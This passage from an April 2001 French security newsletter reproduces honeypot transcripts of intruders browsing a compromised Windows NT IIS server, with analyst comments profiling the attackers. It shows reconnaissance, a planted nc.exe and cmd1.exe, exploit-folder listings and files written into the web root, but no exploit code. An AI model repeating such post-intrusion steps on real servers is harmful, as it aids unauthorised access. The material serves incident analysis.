02/04/01 07:05a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
15 File(s) 78,648,918 bytes<br />
1,689,455,616 bytes free<br />
C:\>type har.txt<br />
(Contenu du fichier)<br />
C:\>ÿþ‡ÿü dir<br />
The name specified is not recognized as an internal<br />
or external command, operable program or batchfile.<br />
C:\>ÿþ dir (Même erreur)<br />
C:\>ÿþ‡ÿü cd wiretrip (Même erreur)<br />
C:\>ÿü‡ÿþ cd exit (Même erreur)<br />
C:\>ÿþ‡ÿü exit (Même erreur)<br />
C:\>ÿü‡ÿþ<br />
Session Incident N°1 - TCP/6968<br />
Cette transcription correspond à la reprise de l'activité interrompue par l'erreur commise précédemment: la<br />
visualisation d'un fichier binaire. Le profil correspond toujours: de nombreuses fautes de frappes et l'utilisation<br />
outrancière de la commande 'dir'.<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 53/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
Microsoft(R) Windows NT(TM)<br />
(C) Copyright 1985-1996 Microsoft Corp.<br />
C:\Program Files\Common Files\system\msadc>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\Program Files\Common Files\system\msadc<br />
02/04/01 07:04a .<br />
02/04/01 07:04a ..<br />
09/25/97 07:41a 596 adcjavas.inc<br />
09/25/97 07:41a 589 adcvbs.inc<br />
04/30/97 11:00p 208,144 cmd1.exe<br />
09/25/97 08:28a 172,816 msadce.dll<br />
09/25/97 08:16a 5,632 msadcer.dll<br />
09/25/97 08:24a 23,312 msadcf.dll<br />
09/25/97 08:24a 91,408 msadco.dll<br />
09/25/97 08:19a 5,120 msadcor.dll<br />
09/26/97 08:19a 42,256 msadcs.dll<br />
02/04/01 06:41a 59,392 nc.exe<br />
10/02/97 07:28a 19,388 readme.txt<br />
13 File(s) 628,653 bytes<br />
1,690,259,968 bytes free<br />
C:\Program Files\Common Files\system\msadc>net session<br />
System error 5 has occurred.<br />
Access is denied.<br />
C:\Program Files\Common Files\system\msadc>cd\<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
02/04/01 07:07a 5,327 har.txt<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
02/04/01 06:49a 69 README.NOW.Hax0r<br />
12/21/00 08:59p TEMP<br />
02/04/01 07:08a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
15 File(s) 78,648,918 bytes<br />
1,690,259,968 bytes free<br />
C:\>del yay.txt<br />
The process cannot access the file because<br />
it is being used by another process.<br />
C:\>cd wiretrip<br />
C:\wiretrip>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\wiretrip<br />
12/26/00 07:09p .<br />
12/26/00 07:09p ..<br />
12/26/00 07:04p 15,501 msadc1.pl<br />
12/26/00 07:04p 17,865 msadc2.pl<br />
12/26/00 07:04p 4,425 RFParalyze.c<br />
12/26/00 07:04p 2,269 RFPickaxe.pl<br />
12/26/00 07:05p 7,393 RFPoison.c<br />
12/26/00 07:04p 12,450 RFPoison.zip<br />
12/26/00 07:04p 1,792 RFProwl.c<br />
12/26/00 07:06p 170,372 whisker.tar.gz<br />
12/26/00 07:06p 173,427 whisker.zip<br />
12/26/00 07:05p 25,229 whiskerids.html<br />
12 File(s) 430,723 bytes<br />
1,690,259,968 bytes free<br />
C:\wiretrip>cd ..<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
02/04/01 07:07a 5,327 har.txt<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
02/04/01 06:49a 69 README.NOW.Hax0r<br />
12/21/00 08:59p TEMP<br />
02/04/01 07:08a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
15 File(s) 78,648,918 bytes<br />
1,690,259,968 bytes free<br />
C:\>cdinetpub<br />
The name specified is not recognized as an<br />
internal or external command, operable program or batch<br />
file.<br />
C:\>dir<br />
(Résultats identiques - Aucun changement)<br />
C:\>cd ..<br />
C:\>cd new folder<br />
C:\New Folder>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\New Folder<br />
12/26/00 07:10p .<br />
12/26/00 07:10p ..<br />
2 File(s) 0 bytes<br />
1,690,259,968 bytes free<br />
C:\New Folder>cd ..<br />
C:\>cd inetpub<br />
C:\InetPub>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\InetPub<br />
12/07/00 03:30p .<br />
12/07/00 03:30p ..<br />
11/26/00 12:40p ftproot<br />
11/26/00 12:40p gophroot<br />
12/07/00 03:31p iissamples<br />
11/26/00 12:40p scripts<br />
12/15/00 08:56p wwwroot<br />
7 File(s) 0 bytes<br />
1,690,259,968 bytes free<br />
C:\InetPub>cd wwwroot<br />
C:\InetPub\wwwroot>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\InetPub\wwwroot<br />
12/15/00 08:56p .<br />
12/15/00 08:56p ..<br />
12/07/00 03:37p cgi-bin<br />
12/07/00 03:37p 4,663 default.asp<br />
12/15/00 10:26p 1,233 default.htm<br />
12/07/00 03:37p 4,325 default.htm.org<br />
12/15/00 09:15p guest<br />
12/07/00 03:37p images<br />
12/15/00 06:36p 709 lrfpbot.gif<br />
12/15/00 07:05p 673 lrfptop.gif<br />
12/15/00 06:36p 1,422 nmrc.gif<br />
12/07/00 03:37p 2,504 postinfo.html<br />
12/15/00 06:36p 968 rfp.gif<br />
12/15/00 06:36p 8,606 rfpback.gif<br />
12/15/00 06:36p 8,606 rfpback1.gif<br />
11/26/00 12:40p samples<br />
12/15/00 06:36p 1,624 sf.gif<br />
12/15/00 06:36p 756 technotronic.gif<br />
12/15/00 06:36p 2,526 void.gif<br />
12/15/00 06:36p 1,213 whisker.gif<br />
12/15/00 06:36p 1,161 win2k.gif<br />
12/07/00 03:37p _private<br />
12/07/00 03:37p 1,759 _vti_inf.html<br />
23 File(s) 42,748 bytes<br />
1,690,259,968 bytes free<br />
C:\InetPub\wwwroot>copy c:\har.txt<br />
1 file(s) copied.<br />
C:\InetPub\wwwroot>del hat r.txt<br />
The filename, directory name, or volume label<br />
syntax is incorrect.<br />
C:\InetPub\wwwroot>del har.txt<br />
C:\InetPub\wwwroot>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\InetPub\wwwroot<br />
02/04/01 07:11a .<br />
02/04/01 07:11a ..<br />
12/07/00 03:37p cgi-bin<br />
12/07/00 03:37p 4,663 default.asp<br />
12/15/00 10:26p 1,233 default.htm<br />
12/07/00 03:37p 4,325 default.htm.org<br />
12/15/00 09:15p guest<br />
02/04/01 07:07a 5,327 har.txt<br />
12/07/00 03:37p images<br />
12/15/00 06:36p 709 lrfpbot.gif<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 54/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
12/15/00 07:05p 673 lrfptop.gif<br />
12/15/00 06:36p 1,422 nmrc.gif<br />
12/07/00 03:37p 2,504 postinfo.html<br />
12/15/00 06:36p 968 rfp.gif<br />
12/15/00 06:36p 8,606 rfpback.gif<br />
12/15/00 06:36p 8,606 rfpback1.gif<br />
11/26/00 12:40p samples<br />
12/15/00 06:36p 1,624 sf.gif<br />
12/15/00 06:36p 756 technotronic.gif<br />
12/15/00 06:36p 2,526 void.gif<br />
12/15/00 06:36p 1,213 whisker.gif<br />
12/15/00 06:36p 1,161 win2k.gif<br />
12/07/00 03:37p _private<br />
12/07/00 03:37p 1,759 _vti_inf.html<br />
24 File(s) 48,075 bytes<br />
1,690,254,336 bytes free<br />
C:\InetPub\wwwroot>dir<br />
(Résultats identiques - Aucun changement)<br />
C:\InetPub\wwwroot>del har.txt<br />
Access is denied.<br />
C:\InetPub\wwwroot>dir<br />
(Résultats identiques - Aucun changement)<br />
C:\InetPub\wwwroot>type<br />
The syntax of the command is incorrect.<br />
C:\InetPub\wwwroot>dir<br />
(Résultats identiques - Aucun changement)<br />
C:\InetPub\wwwroot>del har.txt<br />
Access is denied.<br />
C:\InetPub\wwwroot>dir<br />
(Résultats identiques - Aucun changement)<br />
C:\InetPub\wwwroot>dir<br />
(Résultats identiques - Aucun changement)<br />
C:\InetPub\wwwroot>cd guest<br />
C:\InetPub\wwwroot\guest>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\InetPub\wwwroot\guest<br />
12/15/00 09:15p .<br />
12/15/00 09:15p ..<br />
12/15/00 08:59p 1<br />
12/15/00 09:09p 2<br />
12/15/00 08:59p 3<br />
01/05/01 11:27a 1,829 default.asp<br />
05/07/99 09:14p 200,704 DVMailer.DLL<br />
12/15/00 09:11p 10,017 guestbook.asp<br />
06/15/99 12:17p 18 GuestBook.bot<br />
01/25/01 04:12p 27,843 GuestBook.HTM<br />
01/25/01 04:12p 2,691 GUESTBOOK.LOG<br />
12/15/00 09:22p 413 GuestBook.top<br />
12/15/00 06:36p 709 lrfpbot.gif<br />
12/15/00 07:05p 673 lrfptop.gif<br />
12/15/00 06:36p 1,422 nmrc.gif<br />
06/16/99 10:45a 4,441 Readme<br />
12/15/00 06:36p 968 rfp.gif<br />
12/15/00 06:36p 8,606 rfpback.gif<br />
12/15/00 06:36p 8,606 rfpback1.gif<br />
12/15/00 06:36p 1,624 sf.gif<br />
12/15/00 06:36p 756 technotronic.gif<br />
06/16/99 08:50a 186 ViewGB.asp<br />
12/15/00 06:36p 2,526 void.gif<br />
12/15/00 06:36p 1,213 whisker.gif<br />
12/15/00 06:36p 1,161 win2k.gif<br />
25 File(s) 276,406 bytes<br />
1,690,254,336 bytes free<br />
C:\InetPub\wwwroot\guest>cd ..<br />
C:\InetPub\wwwroot>d:<br />
The system cannot find the drive specified.<br />
C:\InetPub\wwwroot>e:<br />
The system cannot find the drive specified.<br />
C:\InetPub\wwwroot>f:<br />
The system cannot find the drive specified.<br />
C:\InetPub\wwwroot>h :<br />
The name specified is not recognized as an internal<br />
or external command, operable program or batchfile.<br />
C:\InetPub\wwwroot>h:<br />
The system cannot find the drive specified.<br />
C:\InetPub\wwwroot>g:<br />
The system cannot find the drive specified.<br />
C:\InetPub\wwwroot>f:<br />
The system cannot find the drive specified.<br />
C:\InetPub\wwwroot>a:<br />
a:The system cannot find the drive specified.<br />
C:\InetPub\wwwroot>b:<br />
b:The system cannot find the drive specified.<br />
C:\InetPub\wwwroot>cd\<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 C ONFIG.SYS<br />
12/26/00 07:36p exploits<br />
02/04/01 07:07a 5,327 har.txt<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
02/04/01 06:49a 69 README.NOW.Hax0r<br />
12/21/00 08:59p TEMP<br />
02/04/01 07:14a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
15 File(s) 78,648,918 bytes<br />
1,690,254,336 bytes free<br />
C:\>cd temp<br />
C:\TEMP>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\TEMP<br />
12/21/00 08:59p .<br />
12/21/00 08:59p ..<br />
12/16/00 06:54p 81,920 Arm2.tmp<br />
12/16/00 06:54p 16 E65B8AC0.TMP<br />
12/21/00 08:59p IXP1.tmp<br />
12/20/00 05:12p 7,680 DF64D5.tmp<br />
6 File(s) 89,616 bytes<br />
1,690,254,336 bytes free<br />
C:\TEMP>expl<br />
The name specified is not recognized as an internal<br />
or external command, operable program or batchfile.<br />
C:\TEMP>exit<br />
Session Incident N°2 - TCP/6868<br />
Cette transcription correspond à l'incident N°2. Le lecteur notera un style différent et notamment l'utilisation du<br />
caractère '/' en lieu et place du '\' prouvant une habitude UNIX. Notons que l'analyse réseau ne permettait pas de<br />
distinguer le style de l'attaquant, celui-ci étant 'noyé' dans les informations environnantes. Toute la difficulté consiste<br />
désormais à lever le doute: s'agirait-il d'un même indivu utilisant deux accès distants ?<br />
C:\Program Files\Common Files\system\msadc>cd ..<br />
C:\Program Files\Common Files\System>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\Program Files\Common Files\System<br />
12/07/00 03:23p .<br />
12/07/00 03:23p ..<br />
12/07/00 03:34p ado<br />
02/04/01 07:04a msadc<br />
12/07/00 03:34p ole db<br />
11/11/97 12:50p 399,120 wab32.dll<br />
6 File(s) 399,120 bytes<br />
1,690,259,968 bytes free<br />
C:\Program Files\Common Files\System>D:<br />
The system cannot find the drive specified.<br />
C:\Program Files\Common Files\System>cd ..<br />
C:\Program Files\Common Files>cd ..<br />
C:\Program Files>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\Program Files<br />
12/21/00 08:59p .<br />
12/21/00 08:59p ..<br />
12/07/00 03:11p Common Files<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 55/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
12/21/00 08:59p D4<br />
12/07/00 03:23p ICW-Internet Connection<br />
12/07/00 03:37p Microsoft FrontPage<br />
12/07/00 03:34p Mts<br />
12/07/00 03:23p Outlook Express<br />
11/26/00 06:42p Plus!<br />
12/16/00 06:54p Syslogd<br />
11/26/00 06:56p Windows NT<br />
11 File(s) 0 bytes<br />
1,690,259,968 bytes free<br />
C:\Program Files>cd Outlook Express<br />
C:\Program Files\Outlook Express>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\Program Files\Outlook Express<br />
12/07/00 03:23p .<br />
12/07/00 03:23p ..<br />
11/11/97 10:25a 36,176 msimn.exe<br />
10/30/97 10:19p 14,182 msimn.txt<br />
11/11/97 10:25a 97,424 msimnimp.dll<br />
11/11/97 12:50p 1,689,872 msimnui.dll<br />
11/11/97 10:25a 26,144 wab.exe<br />
11/11/97 10:25a 12,464 wabfind.dll<br />
11/11/97 10:25a 106,752 wabimp.dll<br />
11/11/97 10:25a 40,224 wabmig.exe<br />
11/11/97 10:25a 48,624 _isetup.exe<br />
11 File(s) 2,071,862 bytes<br />
1,690,259,968 bytes free<br />
C:\Program Files\Outlook Express>cd ../../<br />
C:\Program Files>cd ..<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
02/04/01 07:07a 5,327 har.txt<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
02/04/01 06:49a 69 README.NOW.Hax0r<br />
12/21/00 08:59p TEMP<br />
02/04/01 07:14a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
15 File(s) 78,648,918 bytes<br />
1,690,259,968 bytes free<br />
C:\>type yay.txt<br />
C:\>mkdir test<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
02/04/01 07:07a 5,327 har.txt<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
02/04/01 06:49a 69 README.NOW.Hax0r<br />
12/21/00 08:59p TEMP<br />
02/04/01 07:22a test<br />
02/04/01 07:14a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
16 File(s) 78,648,918 bytes<br />
1,690,259,968 bytes free<br />
C:\>type har.txt<br />
(Contenu de har.txt en binaire)<br />
C:\>cd exploits<br />
C:\exploits>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\exploits<br />
12/26/00 07:36p .<br />
12/26/00 07:36p ..<br />
12/26/00 07:36p microsoft<br />
12/26/00 07:35p newfiles<br />
12/26/00 07:24p unix<br />
5 File(s) 0 bytes<br />
1,690,259,968 bytes free<br />
C:\exploits>cd unix<br />
C:\exploits\unix>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\exploits\unix<br />
12/26/00 07:24p .<br />
12/26/00 07:24p ..<br />
12/26/00 07:25p sunos-exploits<br />
12/26/00 07:24p tcp-exploits<br />
12/26/00 07:24p trojans<br />
12/26/00 07:16p udp-exploits<br />
12/26/00 07:15p ultrix-exploits<br />
12/26/00 07:15p xwin-exploits<br />
8 File(s) 0 bytes<br />
1,690,259,968 bytes free<br />
C:\exploits\unix>cd sunos-exploits<br />
C:\exploits\unix\sunos-exploits>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\exploits\unix\sunos-exploits<br />
12/26/00 07:25p .<br />
12/26/00 07:25p ..<br />
03/23/98 10:25a 3,209 binmail.sh<br />
03/23/98 10:25a 4,343 chup.c<br />
03/23/98 10:25a 964 kcms.sh<br />
03/23/98 10:25a 1,522 lastlog.c<br />
03/23/98 10:25a 4,988 nittie.c<br />
03/23/98 10:25a 4,622 passwdscript.sh<br />
8 File(s) 19,648 bytes<br />
1,690,259,968 bytes free<br />
C:\exploits\unix\sunos-exploits>cd ..<br />
C:\exploits\unix>cd ..<br />
C:\exploits>cd ..<br />
C:\>echo best honeypot i've seen till now :)>rfp.txt<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
02/04/01 07:07a 5,327 har.txt<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
02/04/01 06:49a 69 README.NOW.Hax0r<br />
02/04/01 07:23a 38 rfp.txt<br />
12/21/00 08:59p TEMP<br />
02/04/01 07:22a test<br />
02/04/01 07:15a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
17 File(s) 78,648,956 bytes<br />
1,690,259,968 bytes free<br />
C:\>cd exploits<br />
C:\exploits>cd ..<br />
C:\>cd wiretrip<br />
C:\wiretrip>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\wiretrip<br />
12/26/00 07:09p .<br />
12/26/00 07:09p ..<br />
12/26/00 07:04p 15,501 msadc1.pl<br />
12/26/00 07:04p 17,865 msadc2.pl<br />
12/26/00 07:04p 4,425 RFParalyze.c<br />
12/26/00 07:04p 2,269 RFPickaxe.pl<br />
12/26/00 07:05p 7,393 RFPoison.c<br />
12/26/00 07:04p 12,450 RFPoison.zip<br />
12/26/00 07:04p 1,792 RFProwl.c<br />
12/26/00 07:06p 170,372 whisker.tar.gz<br />
12/26/00 07:06p 173,427 whisker.zip<br />
12/26/00 07:05p 25,229 hiskerids.html<br />
12 File(s) 430,723 bytes<br />
1,690,259,968 bytes free<br />
C:\wiretrip>cd ..<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 56/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
02/04/01 07:07a 5,327 har.txt<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
02/04/01 06:49a 69 README.NOW.Hax0r<br />
02/04/01 07:23a 38 rfp.txt<br />
12/21/00 08:59p TEMP<br />
02/04/01 07:22a test<br />
02/04/01 07:15a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
17 File(s) 78,648,956 bytes<br />
1,690,259,968 bytes free<br />
C:\>cd exploits<br />
C:\exploits>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\exploits<br />
12/26/00 07:36p .<br />
12/26/00 07:36p ..<br />
12/26/00 07:36p microsoft<br />
12/26/00 07:35p newfiles<br />
12/26/00 07:24p unix<br />
5 File(s) 0 bytes<br />
1,690,259,968 bytes free<br />
C:\exploits>cd newfiles<br />
C:\exploits\newfiles>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\exploits\newfiles<br />
12/26/00 07:35p .<br />
12/26/00 07:35p ..<br />
2 File(s) 0 bytes<br />
1,690,259,968 bytes free<br />
C:\exploits\newfiles><br />
C:\exploits\newfiles>cd ../unix<br />
C:\exploits>cd unix<br />
C:\exploits\unix>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\exploits\unix<br />
12/26/00 07:24p .<br />
12/26/00 07:24p ..<br />
12/26/00 07:25p sunos-exploits<br />
12/26/00 07:24p tcp-exploits<br />
12/26/00 07:24p trojans<br />
12/26/00 07:16p udp-exploits<br />
12/26/00 07:15p ultrix-exploits<br />
12/26/00 07:15p xwin-exploits<br />
8 File(s) 0 bytes<br />
1,690,259,968 bytes free<br />
C:\exploits\unix>cd tcp-exploits<br />
C:\exploits\unix\tcp-exploits>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\exploits\unix\tcp-exploits<br />
12/26/00 07:24p .<br />
12/26/00 07:24p ..<br />
03/23/98 10:26a 1,330 ALLHOSTS.C<br />
03/23/98 10:26a 7,436 bounce.c<br />
03/23/98 10:26a 4,841 CSIRCSEQ.C<br />
03/23/98 10:26a 4,465 datapipe.c<br />
03/23/98 10:26a 3,782 KILL-ME.C<br />
03/23/98 10:26a 8,548 NNTPFORG.C<br />
03/23/98 10:26a 9,372 SZ-SEQ.C<br />
03/23/98 10:26a 5,924 TSPOOF.C<br />
10 File(s) 45,698 bytes<br />
1,690,259,968 bytes free<br />
C:\exploits\unix\tcp-exploits>type ALLHOSTS.C<br />
(Contenu du fichier)<br />
C:\exploits\unix\tcp-exploits>dir<br />
(Résultats identiques<br />
C:\exploits\unix\tcp-exploits>type CSIRCSEQ.C<br />
(Contenu du fichier)<br />
C:\exploits\unix\tcp-exploits>C:<br />
C:\exploits\unix\tcp-exploits>cd ..<br />
C:\exploits\unix>cd ..<br />
C:\exploits>cd ..<br />
C:\>cd ..<br />
C:\>D:<br />
The system cannot find the drive specified.<br />
C:\>A:<br />
The system cannot find the drive specified.<br />
C:\>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\<br />
11/26/00 12:34p 0 AUTOEXEC.BAT<br />
11/26/00 06:57p 322 boot.ini<br />
11/26/00 12:34p 0 CONFIG.SYS<br />
12/26/00 07:36p exploits<br />
02/04/01 07:07a 5,327 har.txt<br />
12/07/00 03:30p InetPub<br />
12/07/00 03:12p Multimedia Files<br />
12/26/00 07:10p New Folder<br />
01/26/01 02:10p 78,643,200 pagefile.sys<br />
12/21/00 08:59p Program Files<br />
02/04/01 06:49a 69 README.NOW.Hax0r<br />
02/04/01 07:23a 38 rfp.txt<br />
12/21/00 08:59p TEMP<br />
02/04/01 07:22a test<br />
02/04/01 07:15a WINNT<br />
12/26/00 07:09p wiretrip<br />
02/04/01 06:43a 0 yay.txt<br />
17 File(s)78,648,956 bytes<br />
1,690,259,968 bytes free<br />
C:\>type README.NOW.Hax0r<br />
Hi, i know that this a is a lab server, but patch the<br />
holes! :-)<br />
C:\>cd Program Files<br />
C:\Program Files>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\Program Files<br />
12/21/00 08:59p .<br />
12/21/00 08:59p ..<br />
12/07/00 03:11p Common Files<br />
12/21/00 08:59p D4<br />
12/07/00 03:23p ICW-Internet Connection<br />
12/07/00 03:37p Microsoft FrontPage<br />
12/07/00 03:34p Mts<br />
12/07/00 03:23p Outlook Express<br />
11/26/00 06:42p Plus!<br />
12/16/00 06:54p Syslogd<br />
11/26/00 06:56p Windows NT<br />
11 File(s) 0 bytes<br />
1,690,259,968 bytes free<br />
C:\Program Files>cd ..<br />
C:\>cd Inetpub<br />
C:\InetPub>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\InetPub<br />
12/07/00 03:30p .<br />
12/07/00 03:30p ..<br />
11/26/00 12:40p ftproot<br />
11/26/00 12:40p gophroot<br />
12/07/00 03:31p iissamples<br />
11/26/00 12:40p scripts<br />
02/04/01 07:15a wwwroot<br />
7 File(s) 0 bytes<br />
1,690,259,968 bytes free<br />
C:\InetPub>cd wwwroot<br />
C:\InetPub\wwwroot>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\InetPub\wwwroot<br />
02/04/01 07:15a .<br />
02/04/01 07:15a ..<br />
12/07/00 03:37p cgi-bin<br />
12/07/00 03:37p 4,663 default.asp<br />
12/15/00 10:26p 1,233 default.htm<br />
12/07/00 03:37p 4,325 default.htm.org<br />
12/15/00 09:15p guest<br />
12/07/00 03:37p images<br />
12/15/00 06:36p 709 lrfpbot.gif<br />
12/15/00 07:05p 673 lrfptop.gif<br />
12/15/00 06:36p 1,422 nmrc.gif<br />
12/07/00 03:37p 2,504 postinfo.html<br />
12/15/00 06:36p 968 rfp.gif<br />
12/15/00 06:36p 8,606 rfpback.gif<br />
12/15/00 06:36p 8,606 rfpback1.gif<br />
11/26/00 12:40p samples<br />
12/15/00 06:36p 1,624 sf.gif<br />
12/15/00 06:36p 756 technotronic.gif<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 57/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
12/15/00 06:36p 2,526 void.gif<br />
12/15/00 06:36p 1,213 whisker.gif<br />
12/15/00 06:36p 1,161 win2k.gif<br />
12/07/00 03:37p _private<br />
12/07/00 03:37p 1,759 _vti_inf.html<br />
23 File(s) 42,748 bytes<br />
1,690,259,968 bytes free<br />
C:\InetPub\wwwroot>echo test > test.txt<br />
C:\InetPub\wwwroot>echo this can't be true > test.txt<br />
C:\InetPub\wwwroot>type test.txt<br />
this can't be true<br />
C:\InetPub\wwwroot>dir<br />
Volume in drive C has no label.<br />
Volume Serial Number is 8403-6A0E<br />
Directory of C:\InetPub\wwwroot<br />
02/04/01 07:33a .<br />
02/04/01 07:33a ..<br />
12/07/00 03:37p cgi-bin<br />
12/07/00 03:37p 4,663 default.asp<br />
12/15/00 10:26p 1,233 default.htm<br />
12/07/00 03:37p 4,325 default.htm.org<br />
12/15/00 09:15p guest<br />
12/07/00 03:37p images<br />
12/15/00 06:36p 709 lrfpbot.gif<br />
12/15/00 07:05p 673 lrfptop.gif<br />
12/15/00 06:36p 1,422 nmrc.gif<br />
12/07/00 03:37p 2,504 postinfo.html<br />
12/15/00 06:36p 968 rfp.gif<br />
12/15/00 06:36p 8,606 rfpback.gif<br />
12/15/00 06:36p 8,606 rfpback1.gif<br />
11/26/00 12:40p samples<br />
12/15/00 06:36p 1,624 sf.gif<br />
12/15/00 06:36p 756 technotronic.gif<br />
02/04/01 07:34a 21 test.txt<br />
